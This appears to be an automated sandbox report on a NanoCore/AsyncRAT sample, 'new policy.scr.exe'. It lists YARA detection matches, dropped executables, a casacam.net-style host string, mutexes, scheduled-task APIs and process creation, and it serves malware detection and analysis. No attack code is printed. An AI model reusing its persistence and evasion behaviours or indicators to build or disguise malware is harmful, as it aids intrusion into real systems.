Source: 00000003.00000002.2866874996.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2866874996.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2866874996.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000002.00000000.1859765201.0000000000282000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000007.00000002.2327789577.0000000005D23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000007.00000002.2327789577.0000000005D23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000002.2327789577.0000000005D23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.2852023359.00000000043F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.1869683888.000000000322A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000003.00000002.2868258629.00000000077D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2868258629.00000000077D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2868258629.00000000077D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000003.00000002.2867384377.0000000007770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2867384377.0000000007770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2867384377.0000000007770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000009.00000002.2363417540.0000000003E7B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000008.00000002.2274074926.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000008.00000002.2274074926.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000003.00000002.2867825853.00000000077A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2867825853.00000000077A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2867825853.00000000077A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000003.00000002.2867712717.0000000007790000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2867712717.0000000007790000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2867712717.0000000007790000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000003.00000002.2870061029.0000000007950000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2870061029.0000000007950000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2870061029.0000000007950000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000008.00000002.2271006345.0000000000702000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000008.00000002.2271006345.0000000000702000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000008.00000002.2271006345.0000000000702000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2274766919.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000008.00000002.2274766919.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000003.00000002.2870782033.0000000007980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2870782033.0000000007980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2870782033.0000000007980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000000.00000002.1877031081.000000000438C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000000.00000002.1877031081.000000000438C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.1877031081.000000000438C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: new policy.scr.exe PID: 7784, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: new policy.scr.exe PID: 7784, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: new policy.scr.exe PID: 7784, type: MEMORYSTR	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Networks!.exe PID: 8108, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: Networks!.exe PID: 8108, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: Networks!.exe PID: 8108, type: MEMORYSTR	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Networks!.exe PID: 7180, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: Networks!.exe PID: 7180, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: Networks!.exe PID: 7180, type: MEMORYSTR	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Networks!.exe PID: 5868, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: Networks!.exe PID: 5868, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: Networks!.exe PID: 5868, type: MEMORYSTR	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Networks!.exe PID: 3720, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: airlineagancy.casacam.net 7076.exe.0.dr, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: airlineagancy.casacam.net 7076.exe.0.dr, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: airlineagancy.casacam.net 7076.exe.0.dr, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'

Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: airlineagancy.casacam.net 7076.exe.0.dr, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: airlineagancy.casacam.net 7076.exe.0.dr, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)

Source: classification engine

Classification label: mal100.troj.evad.winEXE@12/9@19/1

Source: C:\Users\user\Desktop\new policy.scr.exe

File created: C:\Users\user\AppData\Roaming\Networks!.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Mutant created: \Sessions\1\BaseNamedObjects\BGCigTdLypaes6Nr
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\new policy.scr.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{7065c9a5-e7ef-4b4a-9ad2-3b36dc826073}
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7516:64:WilError_03

Source: C:\Users\user\Desktop\new policy.scr.exe

File created: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe

Jump to behavior

Source: new policy.scr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: new policy.scr.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\new policy.scr.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\new policy.scr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: new policy.scr.exe	ReversingLabs: Detection: 55%
Source: new policy.scr.exe	Virustotal: Detection: 56%

Source: C:\Users\user\Desktop\new policy.scr.exe

File read: C:\Users\user\Desktop\new policy.scr.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\new policy.scr.exe "C:\Users\user\Desktop\new policy.scr.exe"
Source: C:\Users\user\Desktop\new policy.scr.exe	Process created: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe "C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe"
Source: C:\Users\user\Desktop\new policy.scr.exe	Process created: C:\Users\user\Desktop\new policy.scr.exe "C:\Users\user\Desktop\new policy.scr.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Networks!.exe "C:\Users\user\AppData\Roaming\Networks!.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Networks!.exe "C:\Users\user\AppData\Roaming\Networks!.exe"
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process created: C:\Users\user\AppData\Roaming\Networks!.exe "C:\Users\user\AppData\Roaming\Networks!.exe"
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process created: C:\Users\user\AppData\Roaming\Networks!.exe "C:\Users\user\AppData\Roaming\Networks!.exe"
Source: C:\Users\user\Desktop\new policy.scr.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7784 -s 1336
Source: C:\Users\user\Desktop\new policy.scr.exe	Process created: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe "C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe"	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process created: C:\Users\user\Desktop\new policy.scr.exe "C:\Users\user\Desktop\new policy.scr.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process created: C:\Users\user\AppData\Roaming\Networks!.exe "C:\Users\user\AppData\Roaming\Networks!.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process created: C:\Users\user\AppData\Roaming\Networks!.exe "C:\Users\user\AppData\Roaming\Networks!.exe"	Jump to behavior

Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: propsys.dll	Jump to behavior
